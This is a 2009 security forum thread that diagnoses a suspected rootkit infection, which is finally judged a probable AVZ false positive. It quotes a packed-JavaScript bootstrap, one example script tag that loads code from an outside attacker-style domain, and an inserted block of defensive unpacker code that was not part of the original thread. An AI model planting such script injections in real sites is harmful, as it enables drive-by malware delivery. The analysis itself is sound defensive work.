I got Rooted in Vista !!!

Discussion in 'malware problems & news' started by StevieO, Jul 3, 2009.

Thread Status:
Not open for further replies.
  1. StevieO (Registered Member; joined Feb 2, 2006; 1,067 posts)

    Yes in Vista and with IE8 and UAC, just the other day !

    It all started so innocently. I Googled for a very well known carpet store hxxp://www.alliedcarpets.com/storelocator.aspx and clicked on the genuine link. ( Rmus kindly checked out the link and reported back that he didn't find/see anything dodgy ) Almost immediately after reaching there, Avira popped up with a Heuristic jscript warning.

    As it was Heuristic i thought it might be a FP, and clicked ignore. Yes i know lol. Nothing obvious or out of the ordinary appeared to be happening, and i continued viewing the site for only about a minute. Of course by that time it would be way too late ! Anyway i carried on surfing some regular safe sites, like here, and after about an hour i shut down the PC as i had to go out.

    When i came back and rebooted, i noticed the HD wasn't making the usual noises. The log on screen appeared and i logged on, in Admin as usual. As the desktop appeared i saw the taskbar looked faded compared to normal, and some of my Apps hadn't started, including ZoneAlarm. Also Avira had been disabled, and even worse was greyed out. I knew something wasn't right but what ?

    As i'm also using a router, i launched a browser and attempted to go online to see if i could. Didn't work, and looking at the router's LEDs i saw problems there too. Oh dear !

    Went to do a System Restore, but they had ALL gone, now what ? As this PC ( Vista ) isn't mine i felt awful, especially as they would want to use it later on. I rebooted and went into SafeMode, with networking, still no sign of them, and stayed in SM. Launched IE and had no problems this time getting out through the Router to the web.

    I have a USB stick with lots of portable security Apps on it. So i plugged it in and updated MBAM, SAS and a2 then scanned in turn, but didn't delete yet as i wanted to see what they all found first. They all detected various things connected with a Bagle nasty and a Trojan. In the heat of the moment i can't have taken any a2 pics, or lost them !

    I located the nasties and uploaded the two .SYS to VT. Notice how the file names are different to what i Actually sent ?

    uzmwmzg5.sys = uzi4ndaz.sys

    utmwmzg5.sys = 11s11ro1s1a2sergio.sys

    perce.gif

    Deleted all the nasties.

    Also ran several other Apps afterwards such as, avz4, Autoruns, HJT, ADS Scanner Version 2.00, mbr v0.3.1 and some ARK's. GMER, Kernel Detective v1.2, RootRepeal v1.2.3.0. I didn't see anything unusual.

    In the end there turned out to be too much damage to try and waste time repairing. I reinstalled from the backup drive, and other places, and back now as good as new.

    The only other recent change made to this PC, was to install Skype yesterday. Only added 2 video contacts to test, which went very smoothly and worked fine first time. Having said that, even though i set it to reject all but those in the contacts, 2 unknown messages got through. How did they get in ? They were both from sex chat/contact sites lol. I copied the obfuscated links and pasted them into IE to see, very enlightening. Still got them if you wanna have a look, for research purposes of course !

    Was it the furniture www Script, something received via Skype or ? I don't know. But as the problems visibly appeared after the Avira warning and my reboot, i'm presuming it might have been the furniture www that has/had been compromised somehow. If so then my fault for ignoring the prompt from Avira.

    The strange thing though, is that in the VirusTotal scan Avira is a No show for this Bagle ? So i'm still not sure exactly where it came from.

    What an adventure !


    Screenies to follow
     
  2. StevieO (Registered Member; joined Feb 2, 2006; 1,067 posts)

    1st Screenies
     

    Attached Files:

  3. StevieO (Registered Member; joined Feb 2, 2006; 1,067 posts)

    2nd lot

    ~VirusTotal screenshots removed~
     

    Attached Files:

    Last edited by a moderator: Jul 3, 2009
  4. kC_ (Registered Member; joined Apr 6, 2007; 452 posts)

    you sound surprised? :argh:
     
  5. StevieO (Registered Member; joined Feb 2, 2006; 1,067 posts)

    Re the VT screenies that have been removed !

    utmwmzg5.sys = 11s11ro1s1a2sergio.sys was only detected by 18 out of 41

    uzmwmzg5.sys = uzi4ndaz.sys was a no detect by any.

    I should have originally added, VT stated both files had been scanned before and i clicked to show those results.

    @ kC, without the Sunshine band. Nice tunes !

    Yes and no ! Mostly yes.

    EDIT

    SAS must have been run in Safe Mode, as it's not a PA. Sorry for any confusion there.
     
  6. zopzop (Registered Member; joined Apr 6, 2006; 632 posts)

    @StevieO

    I can confirm that the link is clean. I went there and nothing out of the ordinary happened (a fully updated Avira was quiet). I think you got that rootkit elsewhere.
     
  7. StevieO (Registered Member; joined Feb 2, 2006; 1,067 posts)

    It's a mystery !!!

    But the main thing is, look what they did to " MS's safest OS ever " as touted pre launch by Bill Gates and baldy ? And running the " safest IE ever " with no ActiveX, iframes etc enabled, and UAC.

    zopzop

    You just nudged me into going there again, and this time i didn't get the Alert i got before.

    So either it was a FP originally and Avira fixed it, or there was something but it got removed by the IT peeps ?

    If neither then, lord knows where that crap came from. I wasn't emailing, downloading anything etc etc.
     
  8. aigle (Registered Member; joined Dec 14, 2005; 11,047 posts; location: Saudi Arabia/ Pakistan)

    Can you share the samples (just PM)? Thanks
     
  9. arran (Registered Member; joined Feb 5, 2008; 1,139 posts)

    can you pm me the samples as well?
     
  10. ronjor (Global Moderator; joined Jul 21, 2003; 57,794 posts; location: Texas)

    This isn't a malware trading forum. Take your messages private. Thanks.
     
  11. Wildest (Registered Member; joined Apr 28, 2009; 304 posts)

    Whoa!! :gack:

    Correct me if I am wrong, but does this imply that there is some value to Avira's WebGuard? o_O
    I have read many posts here that WebGuard is just a marketing gimmick but this seems to be proof to the contrary? o_O
     
  12. Rmus (Exploit Analyst; joined Mar 16, 2005; 3,943 posts; location: California)

    Hi StevieO,

    The AV message with the Heuristic jscript warning for jquery.js could have been a false alert. Wepawet reports it as free from the normal stuff:

    The AV may have responded to the packed code, which is common in both legitimate and malicious javascript files (search for jquery for a description).

    Code:
    eval(function(p, a, c, k, e, r) {
      e = function(c) { return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) };
      if (!''.replace(/^/, String)) { while (c--) r[e(c)] = k[c] || e(c); k = [function(e) { return r[e] }]; e = function() { return '\\w+' }; c = 1 };
      while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
      return p
    }( /* packed payload string, radix, word count and '|'-separated word list follow here; cut off in the original post */ ))
    
    Usually an injected script on the main page will call out to a malicious server for a rigged javascript file. alliedcarpets.com loads jquery.js directly from its server:

    Code:
    <script src="/Scripts/jquery.js">
    This would be a typical malware injection:

    Code:
    <script src="http://www.3ttgfor.com/jquery.js">
    As you say, it's possible that it has been cleaned up, but I checked yesterday when you notified me by PM. You didn't mention the alert for the jquery.js file so I didn't look at it at that time. Unless you had zipped all of the cached files immediately for later analysis, all at this point is speculation.

    In this case, how do you know it happened while viewing alliedcarpets.com? Did you check the file creation date/time for the files? That would tell you whether or not the malware installed on your watch!

    Regarding rootkit.bagle:

    Everything I've seen written about rootkit.bagle shows this malware to be delivered via e-mail messages, file-sharing networks, and downloader sites piggy-backing on something else. It's hard to imagine that this could have sneaked in as a drive-by download - Websense, f-secure, would be all over something like this.

    In tests, I've seen UAC effectively block anything from writing to a system directory. I don't see that this exploit goes anywhere on VISTA with UAC unless installation privileges were granted.

    Could this have happened when another user was on the computer?

    regards,

    rich
     
    Last edited: Jul 4, 2009
  13. innerpeace (Registered Member; joined Jan 15, 2007; 2,095 posts; location: Mountaineer Country)

    StevieO, Is there any particular reason you're running as Admin on your Vista system? If not, try setting your daily use account as User. I set up my sis's Vista rig like that and she hasn't had a problem so far.
     
  14. StevieO (Registered Member; joined Feb 2, 2006; 1,067 posts)

    Wildest

    Avira's WebGuard is far from any marketing gimmick. I've lost count of the number of times it's detected real things on infected www's. Those were no FP's either. www's with verified nasties, and also ones that were later confirmed to be.

    Rmus

    Yes it could have been a packed code detect. I thought i'd mentioned i got a Heuristic jscript alert from Avira ? I didn't check the file creation date/time. Looks like this " exploit " didn't go anywhere on VISTA with UAC after all. Thanx for posting the code etc.

    innerpeace

    I've run as Admin since 98SE days, and just prefer it, no noise. Never had any problems doing so.

    ----------

    Well guess what ?

    On further checking utmwmzg5.sys and utmwmzg5.sys look as if they are connected with AVZ. In which case all those detects by the Apps i scanned with were and are FP's !

    So that leaves perce.gif that was detected, which i don't have now, but probably wasn't a nasty. And it was a .GIF as i have show extensions etc enabled.

    What does this all mean then ? Well either i was hit with some new unknown zero day nasty from i don't know where, or the PC went wibbly wobbly. Could have been a temp hardware issue i suppose, but i doubt it.

    Wish i knew what really happened. But one thing's for sure, something/s did and then several Apps detected the same files as nasties. How weird.
     

    Attached Files: avz.png (18.7 KB)
  15. 1boss1 (Registered Member; joined Jun 26, 2009; 401 posts; location: Australia)

    Out of curiosity i reversed the packer on the jquery.js script to check the plain source: http://pastebin.com/m7c0b3e24

    It mainly just deals with forms, layout data, browser compatibility etc. Something "could" have happened at the particular time you were on the site, but it's more than likely your problems stemmed from elsewhere.
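    A static unpacker for the "p,a,c,k,e,r" packer format quoted by Rmus above and reversed by 1boss1, added here as an example (not code from the thread, from jQuery or from AVZ): it parses the packed arguments, rebuilds the token-to-word table exactly as the packer's e() function defines it, and substitutes the tokens, so the plain source is recovered for inspection without the payload ever being executed. The packed sample string is constructed for the example.

```javascript
// Static unpacker for the Dean Edwards "p,a,c,k,e,r" format.
// Added example: rebuilds the word table and substitutes tokens in place of
// letting eval() run the payload, which is what an analyst wants when the
// script is suspect.

// Same radix encoding the packer's e() function uses: digits 0-9, a-z, then A-Z.
function encodeIndex(c, a) {
  const high = c < a ? '' : encodeIndex(Math.floor(c / a), a);
  const low = c % a;
  return high + (low > 35 ? String.fromCharCode(low + 29) : low.toString(36));
}

// Extract the four arguments from "...}('payload',radix,count,'w1|w2'.split('|'),0,{}))".
function parsePackedArgs(src) {
  const m = /\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)/.exec(src);
  if (!m) return null;
  // Assumption: only \' and \\ escapes occur inside the quoted arguments.
  const unescape = (s) => s.replace(/\\(['\\])/g, '$1');
  return { payload: unescape(m[1]), radix: Number(m[2]), count: Number(m[3]), words: unescape(m[4]).split('|') };
}

// Build token -> word for every index and replace all \w+ tokens in one pass.
function unpackPacked(src) {
  const args = parsePackedArgs(src);
  if (!args) return null;
  const dict = Object.create(null);
  for (let c = 0; c < args.count; c++) {
    const token = encodeIndex(c, args.radix);
    if (args.words[c]) dict[token] = args.words[c]; // empty entry: token is its own word
  }
  return args.payload.replace(/\b\w+\b/g, (w) => (w in dict ? dict[w] : w));
}

// Constructed sample: a harmless function wrapped in the same bootstrap shown in the thread.
const SAMPLE_PACKED =
  "eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35" +
  "?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=" +
  "k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])" +
  "p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}" +
  "('0 1(2){3 \\'4 \\'+2}',62,5,'function|greet|n|return|hello'.split('|'),0,{}))";

console.log(unpackPacked(SAMPLE_PACKED)); // recovered source, never evaluated
```

    Running it on a real packed jquery.js would print the same plain source 1boss1 posted; a payload whose recovered source calls out to another host is the injection pattern Rmus describes.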
     
  16. StevieO (Registered Member; joined Feb 2, 2006; 1,067 posts)

    1boss1

    Thanx for doing that, and the info.
     
  17. StevieO (Registered Member; joined Feb 2, 2006; 1,067 posts)

    utmwmzg5.sys Malware or what ?

    Latest results from a few hours ago -

    At least 17 vendors are seeing this file as Malware, for eg -

    RK Bagle, Trojan unknown, Trojan.Rootkit.Agent

    Now either it's a Major FP from all of them, or they are missing a Real serious threat. Whichever way it's not good.

    I still have this file if any vendors etc wish to test it.
     
  18. Windchild (Registered Member; joined Jun 16, 2009; 571 posts)

    You might want to send it in for analysis, then, to such vendors that detect it only heuristically or as "suspicious" or similar.

    One thing is sure, though. Any .sys file that resides in a user profile folder is inherently extremely suspicious. Basically, it is almost certainly one of two things: either it's malware, or it's part of some anti-malware/anti-rootkit/similar thing that probably wasn't programmed all that well and may be a hazard in itself even if it isn't malware.
     
  19. aigle (Registered Member; joined Dec 14, 2005; 11,047 posts; location: Saudi Arabia/ Pakistan)

    Why do you think they are malware while they are shown to be part of AVZ?
     
  20. zopzop (Registered Member; joined Apr 6, 2006; 632 posts)

    Did anyone contact the maker(s) of AVZ and the various antivirus vendors to report this as a false positive?
     
  21. StevieO (Registered Member; joined Feb 2, 2006; 1,067 posts)

    Windchild

    Sending that file to ALL those vendors is i'm afraid unrealistic. If we were allowed to post online scan images on here then hopefully some/all the vendors would find out it's a FP, and fix it sooner or later.

    Uploading to VT/Jotti etc is a good way to reach all the vendors listed as the files get forwarded to them afterwards. But obviously they only respond to files they interpret as Malware. As it stands FP's such as this will always have to wait. Pity Jo average who gets alerted with FP's and deletes something/s critical etc !

    Yes it's an anti-malware/anti-rootkit .SYS file in AVZ.

    aigle

    Because of the initial above alert i got from Avira, which led me to scan locally with amongst others, MBAM/SAS. I then uploaded the detected files to VirusTotal & Jotti, and nearly half those vendors then detected Rootkit Bagle etc.

    zopzop

    I haven't contacted AVZ as yet, but will do. See above about contacting ALL the vendors.

    Thanx to everyone for your patience regarding this adventure, which i don't want to repeat any time soon !
     